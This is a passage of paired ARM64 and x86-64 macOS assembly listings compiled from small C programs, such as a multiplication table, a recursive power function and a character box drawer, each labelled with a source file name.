.globl _kbhit ## -- Begin function kbhit
.p2align 4, 0x90
_kbhit: ## @kbhit
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _getchar ## -- Begin function getchar
.p2align 4, 0x90
_getchar: ## @getchar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $97, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/162643483.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov w8, #1
stur w8, [x29, #-12]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w9, lt
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
mov w2, #12
adrp x3, l_.str.3@PAGE
add x3, x3, l_.str.3@PAGEOFF
bl ___assert_rtn
LBB0_2:
b LBB0_3
LBB0_3:
ldur w8, [x29, #-8]
subs w8, w8, #9
cset w9, gt
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
mov w2, #13
adrp x3, l_.str.4@PAGE
add x3, x3, l_.str.4@PAGEOFF
bl ___assert_rtn
LBB0_5:
b LBB0_6
LBB0_6:
mov w8, #1
stur w8, [x29, #-12]
b LBB0_7
LBB0_7: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
subs w8, w8, #10
cset w8, gt
tbnz w8, #0, LBB0_10
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=1
ldur w8, [x29, #-12]
; implicit-def: $x11
mov x11, x8
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
ldur w9, [x29, #-8]
ldur w10, [x29, #-12]
mul w10, w9, w10
mov x9, sp
str x11, [x9]
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_7 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_7
LBB0_10:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter a number to calculate the multiplication table up to 10:\n"
l_.str.1: ; @.str.1
.asciz "%d"
l___func__.main: ; @__func__.main
.asciz "main"
l_.str.2: ; @.str.2
.asciz "1191350.c"
l_.str.3: ; @.str.3
.asciz "num >= 0"
l_.str.4: ; @.str.4
.asciz "num <= 9"
l_.str.5: ; @.str.5
.asciz "%d x %d = %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl $1, -12(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $0, -8(%rbp)
setge %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_2
## %bb.1:
leaq L___func__.main(%rip), %rdi
leaq L_.str.2(%rip), %rsi
leaq L_.str.3(%rip), %rcx
movl $12, %edx
callq ___assert_rtn
LBB0_2:
jmp LBB0_3
LBB0_3:
cmpl $9, -8(%rbp)
setle %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_5
## %bb.4:
leaq L___func__.main(%rip), %rdi
leaq L_.str.2(%rip), %rsi
leaq L_.str.4(%rip), %rcx
movl $13, %edx
callq ___assert_rtn
LBB0_5:
jmp LBB0_6
LBB0_6:
movl $1, -12(%rbp)
LBB0_7: ## =>This Inner Loop Header: Depth=1
cmpl $10, -12(%rbp)
jg LBB0_10
## %bb.8: ## in Loop: Header=BB0_7 Depth=1
movl -12(%rbp), %esi
movl -8(%rbp), %edx
movl -8(%rbp), %ecx
imull -12(%rbp), %ecx
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
## %bb.9: ## in Loop: Header=BB0_7 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_7
LBB0_10:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter a number to calculate the multiplication table up to 10:\n"
L_.str.1: ## @.str.1
.asciz "%d"
L___func__.main: ## @__func__.main
.asciz "main"
L_.str.2: ## @.str.2
.asciz "1191350.c"
L_.str.3: ## @.str.3
.asciz "num >= 0"
L_.str.4: ## @.str.4
.asciz "num <= 9"
L_.str.5: ## @.str.5
.asciz "%d x %d = %d\n"
.subsections_via_symbols
| the_stack_data/1191350.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #32]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
add x0, sp, #38
mov w1, #50
bl _fgets
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
str wzr, [sp, #28]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldrsw x8, [sp, #28]
str x8, [sp, #16] ; 8-byte Folded Spill
add x0, sp, #38
bl _strlen
ldr x8, [sp, #16] ; 8-byte Folded Reload
subs x8, x8, x0
cset w8, hs
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldrsw x9, [sp, #28]
add x8, sp, #38
ldrsb w10, [x8, x9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_1
LBB0_4:
ldr w8, [sp, #32]
str w8, [sp, #12] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
bl ___stack_chk_fail
LBB0_6:
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter a word/sentence : \n"
l_.str.1: ; @.str.1
.asciz "\n"
l_.str.2: ; @.str.2
.asciz "%c "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -68(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq -64(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $50, %esi
callq _fgets
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -72(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movslq -72(%rbp), %rax
movq %rax, -80(%rbp) ## 8-byte Spill
leaq -64(%rbp), %rdi
callq _strlen
movq %rax, %rcx
movq -80(%rbp), %rax ## 8-byte Reload
cmpq %rcx, %rax
jae LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movslq -72(%rbp), %rax
movsbl -64(%rbp,%rax), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -72(%rbp), %eax
addl $1, %eax
movl %eax, -72(%rbp)
jmp LBB0_1
LBB0_4:
movl -68(%rbp), %eax
movl %eax, -84(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_6
## %bb.5:
movl -84(%rbp), %eax ## 4-byte Reload
addq $96, %rsp
popq %rbp
retq
LBB0_6:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter a word/sentence : \n"
L_.str.1: ## @.str.1
.asciz "\n"
L_.str.2: ## @.str.2
.asciz "%c "
.subsections_via_symbols
| the_stack_data/226514.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #-2147483648
stur w8, [x29, #-4]
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
mov x8, #2147483647
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%i is warned wrapping\n"
l_.str.1: ; @.str.1
.asciz "max integer is %i\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $-2147483648, -4(%rbp) ## imm = 0x80000000
movl -4(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
movl $2147483647, %esi ## imm = 0x7FFFFFFF
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%i is warned wrapping\n"
L_.str.1: ## @.str.1
.asciz "max integer is %i\n"
.subsections_via_symbols
| the_stack_data/1137765.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _power ; -- Begin function power
.p2align 2
_power: ; @power
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str d0, [sp, #16]
str w0, [sp, #12]
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
fmov d0, #1.00000000
stur d0, [x29, #-8]
b LBB0_5
LBB0_2:
ldr w8, [sp, #12]
mov w10, #2
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldr d0, [sp, #16]
ldr d1, [sp, #16]
fmul d0, d0, d1
ldr w8, [sp, #12]
mov w9, #2
sdiv w0, w8, w9
bl _power
stur d0, [x29, #-8]
b LBB0_5
LBB0_4:
ldr d0, [sp, #16]
str d0, [sp] ; 8-byte Folded Spill
ldr d0, [sp, #16]
ldr d1, [sp, #16]
fmul d0, d0, d1
ldr w8, [sp, #12]
subs w8, w8, #1
mov w9, #2
sdiv w0, w8, w9
bl _power
fmov d1, d0
ldr d0, [sp] ; 8-byte Folded Reload
fmul d0, d0, d1
stur d0, [x29, #-8]
b LBB0_5
LBB0_5:
ldur d0, [x29, #-8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #8] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
fmov d0, #2.00000000
mov w0, #10
bl _power
mov x8, sp
str d0, [x8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldr w0, [sp, #8] ; 4-byte Folded Reload
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%f"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function power
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _power
.p2align 4, 0x90
_power: ## @power
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movsd %xmm0, -16(%rbp)
movl %edi, -20(%rbp)
cmpl $0, -20(%rbp)
jne LBB0_2
## %bb.1:
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -8(%rbp)
jmp LBB0_5
LBB0_2:
movl -20(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
cmpl $0, %edx
jne LBB0_4
## %bb.3:
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
mulsd -16(%rbp), %xmm0
movl -20(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %edi
callq _power
movsd %xmm0, -8(%rbp)
jmp LBB0_5
LBB0_4:
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -32(%rbp) ## 8-byte Spill
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
mulsd -16(%rbp), %xmm0
movl -20(%rbp), %eax
subl $1, %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %edi
callq _power
movaps %xmm0, %xmm1
movsd -32(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
mulsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
LBB0_5:
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI1_0:
.quad 0x4000000000000000 ## double 2
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movl $10, %edi
callq _power
leaq L_.str(%rip), %rdi
movb $1, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%f"
.subsections_via_symbols
| the_stack_data/527699.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
stur w8, [x29, #-20] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
sub x8, x29, #8
str x8, [sp, #32] ; 8-byte Folded Spill
stur wzr, [x29, #-8]
sub x8, x29, #12
str x8, [sp, #24] ; 8-byte Folded Spill
stur wzr, [x29, #-12]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #32] ; 8-byte Folded Reload
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
bl _printf
bl _getchar
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #13
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
stur x0, [x29, #-32] ; 8-byte Folded Spill
bl _scanf
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _printf
bl _getchar
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
ldur x0, [x29, #-32] ; 8-byte Folded Reload
mov x9, sp
sub x8, x29, #14
str x8, [x9]
bl _scanf
ldur w0, [x29, #-8]
ldur w1, [x29, #-12]
ldursb w2, [x29, #-13]
ldursb w3, [x29, #-14]
bl _printBoxCustom
ldur w0, [x29, #-20] ; 4-byte Folded Reload
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.globl _printBoxCustom ; -- Begin function printBoxCustom
.p2align 2
_printBoxCustom: ; @printBoxCustom
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
sturb w2, [x29, #-9]
sturb w3, [x29, #-10]
str wzr, [sp, #16]
b LBB1_1
LBB1_1: ; =>This Loop Header: Depth=1
; Child Loop BB1_3 Depth 2
ldr w8, [sp, #16]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_14
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
str wzr, [sp, #12]
b LBB1_3
LBB1_3: ; Parent Loop BB1_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #12]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_12
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_8
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #12]
ldur w9, [x29, #-4]
subs w9, w9, #1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_8
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_8
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #16]
ldur w9, [x29, #-8]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB1_9
b LBB1_8
LBB1_8: ; in Loop: Header=BB1_3 Depth=2
ldursb w10, [x29, #-10]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB1_10
LBB1_9: ; in Loop: Header=BB1_3 Depth=2
ldursb w10, [x29, #-9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB1_10
LBB1_10: ; in Loop: Header=BB1_3 Depth=2
b LBB1_11
LBB1_11: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_3
LBB1_12: ; in Loop: Header=BB1_1 Depth=1
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB1_13
LBB1_13: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB1_1
LBB1_14:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Digite a altura e a largura do desenho: "
l_.str.1: ; @.str.1
.asciz "%d %d"
l_.str.2: ; @.str.2
.asciz "\n"
l_.str.3: ; @.str.3
.asciz "Digite o caracter da linha: "
l_.str.4: ; @.str.4
.asciz "%c"
l_.str.5: ; @.str.5
.asciz "Digite o caracter das pontas: "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl $0, -8(%rbp)
movl $0, -12(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -12(%rbp), %rsi
leaq -8(%rbp), %rdx
movb $0, %al
callq _scanf
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
callq _getchar
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.4(%rip), %rdi
leaq -13(%rbp), %rsi
movb $0, %al
callq _scanf
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
callq _getchar
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.4(%rip), %rdi
leaq -14(%rbp), %rsi
movb $0, %al
callq _scanf
movl -8(%rbp), %edi
movl -12(%rbp), %esi
movb -13(%rbp), %al
movsbl %al, %edx
movsbl -14(%rbp), %ecx
callq _printBoxCustom
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _printBoxCustom ## -- Begin function printBoxCustom
.p2align 4, 0x90
_printBoxCustom: ## @printBoxCustom
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movb %cl, %al
movb %dl, %cl
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movb %cl, -9(%rbp)
movb %al, -10(%rbp)
movl $0, -16(%rbp)
LBB1_1: ## =>This Loop Header: Depth=1
## Child Loop BB1_3 Depth 2
movl -16(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB1_14
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl $0, -20(%rbp)
LBB1_3: ## Parent Loop BB1_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -20(%rbp), %eax
cmpl -4(%rbp), %eax
jge LBB1_12
## %bb.4: ## in Loop: Header=BB1_3 Depth=2
cmpl $0, -20(%rbp)
je LBB1_8
## %bb.5: ## in Loop: Header=BB1_3 Depth=2
movl -20(%rbp), %eax
movl -4(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
je LBB1_8
## %bb.6: ## in Loop: Header=BB1_3 Depth=2
cmpl $0, -16(%rbp)
je LBB1_8
## %bb.7: ## in Loop: Header=BB1_3 Depth=2
movl -16(%rbp), %eax
movl -8(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jne LBB1_9
LBB1_8: ## in Loop: Header=BB1_3 Depth=2
movsbl -10(%rbp), %esi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB1_10
LBB1_9: ## in Loop: Header=BB1_3 Depth=2
movsbl -9(%rbp), %esi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
LBB1_10: ## in Loop: Header=BB1_3 Depth=2
jmp LBB1_11
LBB1_11: ## in Loop: Header=BB1_3 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_3
LBB1_12: ## in Loop: Header=BB1_1 Depth=1
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
## %bb.13: ## in Loop: Header=BB1_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB1_1
LBB1_14:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Digite a altura e a largura do desenho: "
L_.str.1: ## @.str.1
.asciz "%d %d"
L_.str.2: ## @.str.2
.asciz "\n"
L_.str.3: ## @.str.3
.asciz "Digite o caracter da linha: "
L_.str.4: ## @.str.4
.asciz "%c"
L_.str.5: ## @.str.5
.asciz "Digite o caracter das pontas: "
.subsections_via_symbols
| the_stack_data/1909.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _cArrayMathCA ; -- Begin function cArrayMathCA
.p2align 2
_cArrayMathCA: ; @cArrayMathCA
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
strb w1, [sp, #55]
str x2, [sp, #40]
str x3, [sp, #32]
strb w4, [sp, #31]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x9, x8, #1
str x9, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB0_33
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldrb w8, [sp, #31]
subs w8, w8, #0
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #22
cset w8, hi
tbnz w8, #0, LBB0_31
; %bb.3: ; in Loop: Header=BB0_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI0_0@PAGE
add x10, x10, lJTI0_0@PAGEOFF
Ltmp1:
adr x8, Ltmp1
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
